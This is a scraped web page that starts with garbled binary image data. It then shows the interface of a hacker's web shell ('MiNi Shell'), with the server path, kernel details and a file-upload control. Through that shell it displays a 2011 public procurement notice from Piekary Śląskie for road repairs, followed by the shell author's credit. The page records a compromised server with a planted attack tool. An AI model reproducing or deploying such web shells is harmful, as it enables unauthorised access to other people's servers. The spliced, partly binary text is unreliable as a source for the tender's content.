JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111121/303047-N-2011.html

<p class="kh_header"><b>Piekary Śląskie: Remonty bieżące dróg na terenie miasta Piekary Śląskie w 2012 roku</b><br>
<b>Numer ogłoszenia: 303047 - 2011; data zamieszczenia: 21.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta  Piekary Śląskie , ul. Bytomska 84, 41-940 Piekary Śląskie, woj. śląskie, tel. 032 3939337, faks (032) 287 22 69.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.piekary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty bieżące dróg na terenie miasta Piekary Śląskie w 2012 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje bieżące remonty dróg i chodników na terenie miasta Piekary Śląskie w roku 2012.
Podstawowy zakres zamówienia:

1.  Mechaniczne rozebranie nawierzchni z mieszanek mineralno - bitumicznych grubości 3 cm - 10000 m kw.
2.  Mechaniczne rozebranie nawierzchni z mieszanek mineralno - bitumicznych, dodatek za każdy
    dalszy 1 cm - 20000 mkw.
3.  Frezowanie nawierzchni asfaltowej gr. 4 cm bez transportu  - 30000 m kw.
4.  Frezowanie nawierzchni asfaltowej - każdy następny 1 cm. Grubości bez transportu - 60000 m  kw.
5.  Roboty ziemne koparkami w gr. kat. IV z transportem urobku samochodami samowyładowczymi 5t - 3000 m kw.
6.  Ręczne roboty ziemne z transportem urobku na odległość do 1 km  - 1000 m kw.
7.  Rozebranie obrzeży 6 x 20 na podsypce cementowo-piaskowej - 3000 m kw.
8.  Mechaniczne rozebranie podbudowy z tłucznia kamiennego gr 10 cm - 2000 m kw.
9.  Mechaniczne rozebranie nawierzchni z tłucznia kamiennego - każdy dalszy 1 cm grubości  -  5000 m kw.
10. Mechaniczna rozbiórka chodnika z kostki - 8000 m kw.
11. Mechaniczna rozbiórka nawierzchni z trylinki betonowej - 240 m kw.
12. Rozebranie krawężników na ławie betonowej - 8000 m
13. Ręczne rozebranie kostki betonowej analogia (6 lub 8 cm) z segregacją i układką na paletach - 100 m kw.
14. Wywóz gruzu spryzmowanego samochodami samowyładowczymi na odległość 5 km - 2500 m
     sześć.
15. Transport samochodami samowyładowczymi 5t - za każde dalsze rozpoczęcie 0,5 km odległości transportu - 2400 m sześć.
16. Mechaniczne wyrównanie istniejącej podbudowy mieszanką mineralno - bitumiczną - 100 t
17.Wyrównanie istniejącej podbudowy tłuczniem, średnia grubość warstwy po zagęszczeniu do 10 cm - 600 m szesc.
18. Wykonanie podbudowy z mieszanek mineralno - bitumicznych gr. 4 cm - 10000 m kw.
19. Wykonanie podbudowy z mieszanek mineralno - bitumicznych - dodatek za każdy następny 1 cm grubości warstwy - 30000 m kw.
20. Wykonanie podbudowy z kruszywa łamanego kamiennego  grubości 15 cm - 6000 m kw.
21. Wykonanie podbudowy z kruszywa łamanego, dodatek za każdy następny 1 cm grubości - 25000 m kw.
22. Podbudowa z żużla wielkopiecowego gr. 10 cm, rozścielenie ręczne - 3000 m kw.
23. Podbudowa z żula wielkopiecowego, rozścielenie ręczne,  dodatek za każdy dalszy 1 cm grubości warstwy - 12000 m kw.
24. Remont cząstkowy nawierzchni bitumicznych mieszankami mineralno - bitumicznymi - 100 t 25. Wykonanie warstwy ścieralnej z mieszanek mineralno - bitumicznych gr. 3 cm - 30000 m kw.
26.Wykonanie warstwy ścieralnej z mieszanek mineralno - bitumicznych, dodatek za każdy następny 1 cm grubości warstwy - 60000 m kw.
27.Wykonanie warstwy wiążącej z mieszanek mineralno - bitumicznych gr. 4 cm - 2900 m kw.
28.Wykonanie warstwy wiążącej z mieszanek mineralno - bitumicznych, dodatek za każdy następny  1 cm grubości warstwy - 58000 m kw.
29.Wykonanie warstwy wiążącej z mieszanek mineralno bitumicznych o grubości  4 cm (WMS) - 3000 m kw.
30.Wykonanie warstwy ścieralnej z mieszanek mineralno - bitumicznych o grubości 4 cm (SMA) - 3000 m kw.
31.Skropienie nawierzchni drogowej asfaltem - 40000 m kw.
32.Ręczne ułożenie nawierzchni z mieszanek mineralno - bitumicznych grubości 5 cm - 500 m kw.
33.Wykonanie nawierzchni chodników, wjazdów z kostki brukowej betonowej grubości 6 cm - bez wartości kostki - 1000 m kw.
34. Wykonanie nawierzchni chodników, wjazdów, placów z kostki z kostki brukowej betonowej gr. 8 cm - bez wartości kostki - 6000 m kw.
35.Wykonanie nawierzchni chodników, koszt kostki prostokątnej gr 6 cm kolorowej i narzuty - 300 m kw.
36.Wykonanie nawierzchni chodników, koszt kostki prostokątnej gr 6 cm szarej i narzuty - 700 m kw.
37.Wykonanie nawierzchni chodników, koszt kostki prostokątnej gr. 8 cm kolorowej i narzuty - 2000 m kw.
38.Wykonanie nawierzchni chodników, koszt kostki prostokątnej gr 8 cm szarej i narzuty - 4000 m kw.
39.Chodniki z płytek betonowych 35x35x5 cm lub 30x30x5 analogia - 100 m kw.
40.Utwardzenie terenu płytami ażurowymi (wjazdy, skarpy itp.) - analogia - 100 m kw.
41.Ułożenie krawężnika betonowego 15x30 cm na ławie betonowej z oporem - 3000 m
42.Ułożenie obrzeży betonowych 6x20 cm na podsypce piaskowej - 2000 m
43.Przełożenie istniejącego krawężnika na nowej ławie betonowej - 500 m
44.Przełożenie istniejącego obrzeża na podsypce piaskowej - 500 m
45.Nawierzchnia z żużla wielkopiecowego grubości 25 cm z wykopem i odwiezieniem ziemi na odległość do 5 km - 4800 m kw.
46.Korytowanie i wykonanie nawierzchni z frezów grubości 15 cm, skropienie i przesypanie gabro oraz odwiezieniem ziemi na odległość do 5 km - 500 m kw.
47.Spoinowanie pęknięć do 5 mm nawierzchni asfaltowej (i czyszczenie spoin) - 1000 m
48.Spoinowanie ubytków >5 do 50 mm w nawierzchni asfaltowej (i czyszczenie spoin) - 1000 m
49.Spoinowanie ubytków  > 50 mm nawierzchni asfaltowej (i czyszczenie spoin) - 1000 m
50.Zabudowa odwodnień liniowych (bez wartości materiału) - 50 m 
51.Regulacja pionowa studni teletechnicznych - 30 szt.
52.Do wykonania regulacji, koszt pokrywy studni i narzuty - 10 szt.
53.Regulacja pionowa studzienek dla krat ściekowych ulicznych - 50 szt.
54.Do wykonania regulacji koszt kratki i narzuty - 15 szt.
55.Do wykonania regulacji, koszt kratki bocznej i narzuty - 10 szt.
56.Regulacja pionowa studzienek dla włazów kanałowych - 50 szt.
57.Do wykonania regulacji koszt włazu i narzuty - 20 szt.
58.Regulacja pionowa studzienek dla zaworów wodociągowych i gazowych - 100 szt.
59.Do wykonania regulacji, koszt skrzynki do zaworów i narzuty - 20 szt.
60.Koszenie poboczy kosiarkami mechanicznymi, zagrabienie trawy i odwiezienie na odległość 5 km - 280000 m kw.
61.Frezowanie pni po ściętych drzewach - 100000 cm kw.
62.Humusowanie skarp z obsianiem przy grubości warstwy humusu 5 cm - 3000 m kw.
63.Ręczne przekopanie gleby na terenie płaskim w gruncie zadarnionym - 500 m kw.
64.Stawka roboczogodziny z narzutami - 10000 r-g.

Przyjęte w kosztorysie ilości przedmiarowe robót są szacunkowe. Faktyczny zakres robót realizowany będzie w zależności od potrzeb zamawiającego na podstawie zleceń cząstkowych. Istnieje możliwość wystąpienia robót zamiennych, które rozliczane będą na podstawie wskaźników i cen z kosztorysu ofertowego przy ich braku wg sekocenbud IV kwartał 2011 r. lub w razie ich braku wg faktur.
Ceny jednostkowe powinny zostać wyliczone ściśle wg podanych w przedmiarze podstaw wyceny (KNR-y) i zawierać wszystkie elementy robót w nich wyszczególnione. A kosztorys ofertowy uwzględniać uwagi zawarte w specyfikacjach technicznych i umowie.
Wykonawca powinien przystąpić do robót w ciągu jednego dnia od otrzymania zlecenia, a w przypadku robót awaryjnych w ciągu 180 minut od zgłoszenia telefonicznego oraz do oznakowania miejsca awarii w ciągu 60 minut od zgłoszenia, niezależnie od pory dnia i dni wolnych od pracy. Wykonawca powinien zapewnić całodobową łączność telefoniczną oraz udostępnić numery kontaktowe przy podpisaniu umowy.
Wykonawca udzieli na wykonane roboty 60 miesięcy gwarancji.
Wykonawca, którego oferta zostanie wybrana, w dniu podpisania umowy przedstawi kosztorys szczegółowy na zakres przedmiaru robót zawierający zestawienie zastosowanych cen: R,M,S,KP,Kz i Z.
W trakcie realizacji zadania wystawiane będą faktury miesięczne za roboty zakończone. Będą one wystawiane najpóźniej do 7-go dnia kolejnego miesiąca.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Powtórzenie tego samego rodzaju robót o wartości do 50 % zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do postępowania, każdy Wykonawca zobowiązany  jest  wnieść wadium 
         w wysokości 120 000,00 zł (słownie: sto dwadzieścia  tysięcy złotych 00/100).
2. Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy,    tj.:
w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -  kredytowej, z tym  że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr z 2007 Nr 42, poz. 275).
      3.Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
      4.Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego:
Bank: ING Bank Śląski S.A. O/ Piekary Śląskie NR Rachunku: 07 1050 1230 1000 0023 2549 4256
      5.W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje 
      Termin uznania kwoty na rachunku Zamawiającego</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończonych co najmniej trzech robót budowlanych, tożsamych z przedmiotem zamówienia, o wartości min. 5 mln. złotych brutto rocznie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>udokumentowanie dysponowania sprzętem w następujących ilościach:
1.
Samochód samowyładowczy
-4 szt,
2.
Walec drogowy 7 - 18 T stalowy
-1 szt,
3.
Walec ogumiony
-1 szt,
4.
Walec 0,6 T
- 2 szt,
5.
Zagęszczarka
-2 szt,
6.
Piła spalinowa do cięcia asfaltu 
-2 szt,
7.
Piła spalinowa do cięcia kostki
-2 szt,
8.
Frezarka do nawierzchni bitumicznych
-1 szt,
9.
Pilarka spalinowa
-2 szt,
10.
Sprężarka spalinowa (przewoźna)
-2 szt,
11.
Spychokoparka
-2 szt,
12.
Rozścielacz do mas bitumicznych o szerokości roboczej 1,5 - 6,0 m
-1 szt,
13.
Ciągnik kołowy
-2 szt,
14.
Skrapiarka do asfaltu
-2 szt,
15.
Przyczepa samowyładowcza 
-2 szt,
16.
Przyczepa niskopodwoziowa
-2 szt,
17.
Samochód dostawczy
-1 szt,
18.
Samochód skrzyniowy
-1 szt,
19.
Kosiarka ciągnikowa z wysięgnikiem
-1 szt,
20.
Wykaszarka spalinowa
-2 szt,
21.
Frezarka do pni
-1 szt,
22.
Recykler
-1 szt,
23.
Kocioł do produkcji asfaltu lanego
-1 szt,
24.
Komplet oznakowania robót drogowych
-4 szt,
25.
Komplet sygnalizacji wahadłowej
-1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- udokumentowanie dysponowania osobą z uprawnieniami budowlanymi do pełnienia funkcji kierownika budowy w specjalności drogowej. Wymaga się, aby osoba ta posiadała aktualny wpis do Okręgowej Izby Budownictwa i opłaconą składkę</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- udokumentowanie posiadania środków finansowych lub zdolności kredytowej w wysokości 5 mln złotych brutto,
- udokumentowanie posiadania ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę min. 4 mln złotych. W przypadku wykonawców razem ubiegających się o udzielenie zamówienia, ubezpieczenie może być wspólne</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.piekary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piekary Śląskie, Biuro Zamówień Publicznych, pok. 218, ul. Bytomska 84, 41-940 Piekary Śl..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2011 godzina 09:00, miejsce: Urząd Miasta Piekary Śląskie, Biuro Zamówień Publicznych, pok. 218, ul. Bytomska 84, 41-940 Piekary Śl.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com